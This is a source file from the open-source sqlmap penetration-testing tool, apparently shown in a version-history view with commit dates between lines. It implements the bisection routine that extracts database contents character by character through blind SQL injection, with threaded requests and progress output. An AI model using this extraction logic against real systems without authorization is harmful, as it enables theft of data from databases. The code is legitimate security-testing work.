sqlmap/lib/techniques/blind/inference.py

323 lines
12 KiB
Python
Raw Normal View History

2008-10-15 19:38:22 +04:00
#!/usr/bin/env python
"""
2008-10-15 19:56:32 +04:00
$Id$
2008-10-15 19:38:22 +04:00
This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
2010-03-03 18:26:27 +03:00
Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
2008-10-15 19:38:22 +04:00
sqlmap is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free
Software Foundation version 2 of the License.
sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
details.
You should have received a copy of the GNU General Public License along
with sqlmap; if not, write to the Free Software Foundation, Inc., 51
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
import threading
import time
import traceback
2008-10-15 19:38:22 +04:00
from lib.core.agent import agent
from lib.core.common import dataToSessionFile
from lib.core.common import dataToStdout
from lib.core.common import getCharset
2008-10-15 19:38:22 +04:00
from lib.core.common import replaceNewlineTabs
2010-01-15 19:06:59 +03:00
from lib.core.common import safeStringFormat
from lib.core.convert import urlencode
2008-10-15 19:38:22 +04:00
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.exception import sqlmapConnectionException
2008-10-15 19:38:22 +04:00
from lib.core.exception import sqlmapValueException
from lib.core.exception import sqlmapThreadException
from lib.core.exception import unhandledException
2008-10-15 19:38:22 +04:00
from lib.core.progress import ProgressBar
from lib.core.unescaper import unescaper
from lib.request.connect import Connect as Request
2010-02-04 20:45:56 +03:00
def bisection(payload, expression, length=None, charsetType=None, firstChar=None, lastChar=None):
2008-10-15 19:38:22 +04:00
"""
Bisection algorithm that can be used to perform blind SQL injection
on an affected host
"""
partialValue = ""
finalValue = ""
asciiTbl = getCharset(charsetType)
if "LENGTH(" in expression or "LEN(" in expression:
firstChar = 0
elif conf.firstChar is not None and ( isinstance(conf.firstChar, int) or ( isinstance(conf.firstChar, str) and conf.firstChar.isdigit() ) ):
firstChar = int(conf.firstChar) - 1
elif firstChar is None:
firstChar = 0
elif ( isinstance(firstChar, str) and firstChar.isdigit() ) or isinstance(firstChar, int):
firstChar = int(firstChar) - 1
if "LENGTH(" in expression or "LEN(" in expression:
lastChar = 0
elif conf.lastChar is not None and ( isinstance(conf.lastChar, int) or ( isinstance(conf.lastChar, str) and conf.lastChar.isdigit() ) ):
lastChar = int(conf.lastChar)
elif lastChar in ( None, "0" ):
lastChar = 0
elif ( isinstance(lastChar, str) and lastChar.isdigit() ) or isinstance(lastChar, int):
lastChar = int(lastChar)
2008-10-15 19:38:22 +04:00
if kb.dbmsDetected:
_, _, _, _, _, _, fieldToCastStr = agent.getFields(expression)
nulledCastedField = agent.nullAndCastField(fieldToCastStr)
expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1)
expressionUnescaped = unescaper.unescape(expressionReplaced)
2008-10-15 19:38:22 +04:00
else:
expressionUnescaped = unescaper.unescape(expression)
2008-10-15 19:38:22 +04:00
debugMsg = "query: %s" % expressionUnescaped
logger.debug(debugMsg)
2008-10-15 19:38:22 +04:00
if length and not isinstance(length, int) and length.isdigit():
length = int(length)
if length == 0:
return 0, ""
if lastChar > 0 and length > ( lastChar - firstChar ):
length = ( lastChar - firstChar )
showEta = conf.eta and isinstance(length, int)
2008-10-15 19:38:22 +04:00
numThreads = min(conf.threads, length)
threads = []
2008-10-15 19:38:22 +04:00
if showEta:
progress = ProgressBar(maxValue=length)
progressTime = []
2010-03-12 17:48:33 +03:00
if numThreads is not None:
debugMsg = "starting %d thread%s" % (numThreads, ("s" if numThreads > 1 else ""))
logger.debug(debugMsg)
if conf.verbose >= 1 and not showEta:
2008-10-15 19:38:22 +04:00
if isinstance(length, int) and conf.threads > 1:
2010-03-12 15:46:26 +03:00
dataToStdout("[%s] [INFO] retrieved: %s" % (time.strftime("%X"), "_" * min(length, conf.progressWidth)))
2008-10-15 19:38:22 +04:00
dataToStdout("\r[%s] [INFO] retrieved: " % time.strftime("%X"))
else:
dataToStdout("[%s] [INFO] retrieved: " % time.strftime("%X"))
queriesCount = [0] # As list to deal with nested scoping rules
2010-02-04 20:45:56 +03:00
def getChar(idx, asciiTbl=asciiTbl):
maxValue = asciiTbl[len(asciiTbl)-1]
2008-10-15 19:38:22 +04:00
minValue = 0
while len(asciiTbl) != 1:
2008-10-15 19:38:22 +04:00
queriesCount[0] += 1
position = (len(asciiTbl) / 2)
posValue = asciiTbl[position]
if kb.dbms == "SQLite":
posValueOld = posValue
posValue = chr(posValue)
2010-01-15 19:06:59 +03:00
forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx, posValue))
result = Request.queryPage(urlencode(forgedPayload))
if kb.dbms == "SQLite":
posValue = posValueOld
if result:
minValue = posValue
asciiTbl = asciiTbl[position:]
2008-10-15 19:38:22 +04:00
else:
maxValue = posValue
asciiTbl = asciiTbl[:position]
2008-10-15 19:38:22 +04:00
if len(asciiTbl) == 1:
2008-10-15 19:38:22 +04:00
if maxValue == 1:
return None
else:
return chr(minValue + 1)
2010-02-04 20:45:56 +03:00
2008-10-15 19:38:22 +04:00
def etaProgressUpdate(charTime, index):
if len(progressTime) <= ( (length * 3) / 100 ):
eta = 0
else:
midTime = sum(progressTime) / len(progressTime)
midTimeWithLatest = (midTime + charTime) / 2
eta = midTimeWithLatest * (length - index) / conf.threads
progressTime.append(charTime)
progress.update(index)
progress.draw(eta)
2010-02-04 20:45:56 +03:00
2008-10-15 19:38:22 +04:00
if conf.threads > 1 and isinstance(length, int) and length > 1:
value = [ None ] * length
index = [ firstChar ] # As list for python nested function scoping
2008-10-15 19:38:22 +04:00
idxlock = threading.Lock()
iolock = threading.Lock()
2010-03-10 17:14:27 +03:00
conf.seqLock = threading.Lock()
conf.threadContinue = True
2010-02-04 20:45:56 +03:00
2008-10-15 19:38:22 +04:00
def downloadThread():
try:
while conf.threadContinue:
idxlock.acquire()
2008-10-15 19:38:22 +04:00
if index[0] >= length:
idxlock.release()
2008-10-15 19:38:22 +04:00
return
2008-10-15 19:38:22 +04:00
index[0] += 1
curidx = index[0]
idxlock.release()
2008-10-15 19:38:22 +04:00
if conf.threadContinue:
charStart = time.time()
val = getChar(curidx)
if val is None:
raise sqlmapValueException, "failed to get character at index %d (expected %d total)" % (curidx, length)
else:
break
2008-10-15 19:38:22 +04:00
value[curidx-1] = val
if conf.threadContinue:
if showEta:
etaProgressUpdate(time.time() - charStart, index[0])
elif conf.verbose >= 1:
2010-03-12 15:38:19 +03:00
startCharIndex = 0
endCharIndex = 0
for i in xrange(length):
if value[i] is not None:
endCharIndex = max(endCharIndex, i)
output = ''
2010-03-12 15:46:26 +03:00
if endCharIndex > conf.progressWidth:
startCharIndex = endCharIndex - conf.progressWidth
2010-03-12 15:38:19 +03:00
count = 0
for i in xrange(startCharIndex, endCharIndex):
output += '_' if value[i] is None else value[i]
2010-03-12 15:38:19 +03:00
for i in xrange(length):
count += 1 if value[i] is not None else 0
2010-03-12 15:38:19 +03:00
if startCharIndex > 0:
2010-03-12 17:31:14 +03:00
output = '..' + output[2:]
2010-03-12 15:46:26 +03:00
if endCharIndex - startCharIndex == conf.progressWidth:
2010-03-12 17:31:14 +03:00
output = output[:-2] + '..'
2010-03-12 16:07:07 +03:00
output += '_' * (min(length, conf.progressWidth) - len(output))
status = ' %d/%d (%d%s)' % (count, length, round(100.0*count/length), '%')
2010-03-12 15:38:19 +03:00
output += status if count != length else " "*len(status)
iolock.acquire()
dataToStdout("\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), replaceNewlineTabs(output, stdout=True)))
iolock.release()
except (sqlmapConnectionException, sqlmapValueException), errMsg:
conf.threadException = True
logger.error("thread %d: %s" % (numThread + 1, errMsg))
except KeyboardInterrupt:
conf.threadException = True
print
logger.debug("waiting for threads to finish")
try:
while (threading.activeCount() > 1):
pass
except KeyboardInterrupt:
raise sqlmapThreadException, "user aborted"
except:
conf.threadException = True
errMsg = unhandledException()
logger.error("thread %d: %s" % (numThread + 1, errMsg))
traceback.print_exc()
2010-02-04 20:45:56 +03:00
2008-10-15 19:38:22 +04:00
# Start the threads
for numThread in range(numThreads):
thread = threading.Thread(target=downloadThread)
2008-10-15 19:38:22 +04:00
thread.start()
threads.append(thread)
# And wait for them to all finish
try:
alive = True
while alive:
alive = False
for thread in threads:
if thread.isAlive():
alive = True
thread.join(5)
except KeyboardInterrupt:
conf.threadContinue = False
raise
2010-03-11 14:20:52 +03:00
# If we have got one single character not correctly fetched it
# can mean that the connection to the target url was lost
if None in value:
for v in value:
if isinstance(v, str) and v is not None:
partialValue += v
2008-10-15 19:38:22 +04:00
if partialValue:
finalValue = partialValue
infoMsg = "\r[%s] [INFO] partially retrieved: %s" % (time.strftime("%X"), finalValue)
else:
finalValue = "".join(value)
infoMsg = "\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), finalValue)
2008-10-15 19:38:22 +04:00
if isinstance(finalValue, str) and len(finalValue) > 0:
dataToSessionFile(replaceNewlineTabs(finalValue))
2008-10-15 19:38:22 +04:00
if conf.verbose >= 1 and not showEta and infoMsg:
dataToStdout(infoMsg)
2008-10-15 19:38:22 +04:00
2010-03-10 17:14:27 +03:00
conf.seqLock = None
2008-10-15 19:38:22 +04:00
else:
index = firstChar
2008-10-15 19:38:22 +04:00
while True:
index += 1
2008-10-15 19:38:22 +04:00
charStart = time.time()
val = getChar(index, asciiTbl)
2008-10-15 19:38:22 +04:00
if val is None or ( lastChar > 0 and index > lastChar ):
2008-10-15 19:38:22 +04:00
break
finalValue += val
2008-10-15 19:38:22 +04:00
dataToSessionFile(replaceNewlineTabs(val))
2008-10-15 19:38:22 +04:00
if showEta:
etaProgressUpdate(time.time() - charStart, index)
elif conf.verbose >= 1:
2008-10-15 19:38:22 +04:00
dataToStdout(val)
if conf.verbose >= 1 or showEta:
2008-10-15 19:38:22 +04:00
dataToStdout("\n")
if ( conf.verbose in ( 1, 2 ) and showEta and len(str(progress)) >= 64 ) or conf.verbose >= 3:
infoMsg = "retrieved: %s" % finalValue
2008-10-15 19:38:22 +04:00
logger.info(infoMsg)
if not partialValue:
dataToSessionFile("]\n")
if conf.threadException:
raise sqlmapThreadException, "something unexpected happen into the threads"
2008-10-15 19:38:22 +04:00
return queriesCount[0], finalValue